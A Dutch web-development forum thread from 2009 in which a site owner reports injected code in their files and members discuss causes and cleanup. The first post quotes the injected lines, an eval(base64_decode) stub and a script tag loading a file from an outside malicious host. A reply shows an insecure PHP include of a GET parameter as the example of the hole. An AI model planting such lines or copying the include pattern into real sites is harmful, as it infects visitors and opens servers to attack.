Scripts - Tutorials - Forum - Downloads - Showcase - Contact

Artikels

VPN vergelijken

Algemeen

Beginpagina

FAQ

Grafische worm (243)

Links

Nieuwsartikels

Nieuwsarchief

Boeken programmeren

Overzicht

Samenwerken

Webhosting

Zoek op Sitemasters

Leden

Registreren

Ledenlijst

Ons team

Links

webhostingtop10.be

Sociale media

Follow @sitemasters

Sitemasters

Adverteren op Sitemasters?

Contacteer ons

RSS

Link naar ons

Donaties

Poll

Je moet ingelogd zijn om te stemmen.

Statistieken

Linkpartners

Forum

Categorieën > PHP & SQL

Hack

prienstra - 14/10/2009 08:48 (laatste wijziging 14/10/2009 08:48)
MySQL interesse		Beste mensen, Vanacht zijn er in bestanden op de ftp server (vooral de index.php en .js bestanden) het volgende geplaatst: eval(base64_decode('blablabla')); en <script src=http://polynovepole.com.ua/player/cms_manage_users.php ></script> Wat kan hiervan de oorzaak zijn: - Sql injection - mappen (op server) chmod op 888 - Cross-site scripting (xss)

17 antwoorden

Gesponsorde links

ArieMedia - 14/10/2009 09:12
PHP ver gevorderde		Wat is de vraag nu? SQL-Injection, alleen als je hele pagina's uit je database haalt.. dan wel Mappen op server chmod, als je een uploadscript hebt.. ja, dan kan dat xss is het meest voorkomende geval, dus ik zou hem op deze gokken.. Als je dingen hebt zoals php code - Bekijk de code zonder highlighting - Klap code in if(isset($_GET['p'])) { include $_GET['p']; } if(isset($_GET['p'])) { include $_GET['p']; } Dan is het heel simpel om hier mijn bestand te gaan includen :-) Heb er een poos terug een klein artikel over geschreven : Veilige includes

prienstra - 14/10/2009 09:44
MySQL interesse		Ik heb al meer gevonden: Het is een virus, want het bestand gifimg.php is ook op de server geplaatst. http://www.tech...-the-loose/ Heeft iemand hier ervaring mee?

ArieMedia - 14/10/2009 09:52
PHP ver gevorderde		prienstra schreef: Ik heb al meer gevonden: Het is een virus, want het bestand gifimg.php is ook op de server geplaatst. http://www.tech...-the-loose/ Heeft iemand hier ervaring mee? Als ik jou was zal ik je website tijdelijk down halen en de backup erop zetten als je hosting-aanbieder het virus er af heeft gehaald.

prienstra - 14/10/2009 10:07
MySQL interesse		Zit het virus bij de hosting? Zit dat niet op mijn eigen computer? Iik heb het ftp wachwoord veranderd, en idd de backup terug geplaatst.

ArieMedia - 14/10/2009 10:11
PHP ver gevorderde		prienstra schreef: Zit het virus bij de hosting? Zit dat niet op mijn eigen computer? Iik heb het ftp wachwoord veranderd, en idd de backup terug geplaatst. Als je het niet op andere websites merkt en je dmv een backup terugplaatsen het virus vervangt op jou website dan staat het op de hosting van je en niet op je pc. (Annuwel hij zich misschien wel ten download kan aanbieden waardoor je hem nu wel bezit)

jaronneke - 14/10/2009 10:24
MySQL interesse		Offtopic: Arie jij bent echt de enigste die het woord :Annuwel : gebruikt ?:P

prienstra - 14/10/2009 10:24
MySQL interesse		Ik vermoed dat het met wordpress te maken heeft. Toen ik nog een blog had, was het de eerste keer van zo'n hack (op 2 site's van mij. Beide bij andere hosting). Ik heb na die hack mijn bloggen verwijderd, maar nooit mijn ftp wachtwoord veranderd. Ik denk dat die "hackers" de ftp-login en wachtwoord opgeslagen hebben in hun database. En daardoor vannacht weer toegang hadden. Nu zijn de ftp wachtwoorden gewijzigd, en heb de auto save password functie in ws_ftp uitgeschakeld.

ArieMedia - 14/10/2009 10:57 (laatste wijziging 14/10/2009 11:05)
PHP ver gevorderde		prienstra schreef: Ik vermoed dat het met wordpress te maken heeft. Toen ik nog een blog had, was het de eerste keer van zo'n hack (op 2 site's van mij. Beide bij andere hosting). Ik heb na die hack mijn bloggen verwijderd, maar nooit mijn ftp wachtwoord veranderd. Ik denk dat die "hackers" de ftp-login en wachtwoord opgeslagen hebben in hun database. En daardoor vannacht weer toegang hadden. Nu zijn de ftp wachtwoorden gewijzigd, en heb de auto save password functie in ws_ftp uitgeschakeld. Dan hopen we maar dat het zo opgelost is he @jaronneke Geen flauw idee, annuwel ik het niet zo vaak langs zie komen Wat een raar "woord" eigenlijk. Edit: Vetcool, als je op Annuwel googled krijg je posts van mij xD

jaronneke - 14/10/2009 11:16 (laatste wijziging 14/10/2009 11:51)
MySQL interesse		Dat komt omdat het geen Nederlands is, je bedoelt: "alhoewel"

Gerard - 14/10/2009 11:52
Ouwe rakker		Het lijkt er inderdaad op dat het gaat om die Wordpress exploit. In het artikel wat je linkt wordt ook aangegeven dat de FTP credentials worden opgezocht om zodoende meer websites te kunnen besmetten. Mocht dit het niet zijn dan zou ik even contact opnemen met je hosting provider. Er is namelijk ook een exploit actief voor de FTP service waar DirectAdmin servers gebruik van maken. Hier hebben wij op Sitemasters ook last van gehad in het verleden.

prienstra - 14/10/2009 12:00
MySQL interesse		Gerard, bedankt voor je reactie. Ik ga erop letten. Ik hoop dat het over is.

Thijs - 14/10/2009 12:08
Crew hosting		De exploit waar Gerard naar referent is een probleem met je FTP programma waar alle wachtwoorden in zijn opgeslagen. Een hacker kan d.m.v. bijvoorbeeld een trojan op je PC deze wachtwoord raadplegen en gebruiken om bestanden up te loaden naar je hosting account. In dit geval is dat dus een abuse op je eigen PC.

Gerard - 14/10/2009 15:29
Ouwe rakker		Ik had het eigenlijk over één van de verschillende exploits die er zijn voor ProFTPD 1.3.1.

Koen - 14/10/2009 16:45
PHP expert		Hoe kan je de mode van een bestand in godsnaam op 888 zetten?

prienstra - 14/10/2009 18:36 (laatste wijziging 14/10/2009 18:44)
MySQL interesse		op welke chmod moet ik een map zetten waarnaar toe geupload wordt via php en via cronjobs? Ik heb nu de mappen op 777.

Aar - 14/10/2009 21:38
PHP interesse		755

Mroseboom - 22/10/2009 16:41
Lid		Huh mappen 755 zo als aar zij Bestanden 644 Groetjes

Gesponsorde links

Dit onderwerp is gesloten.

Actiefste leden van de maand

Actieve forumberichten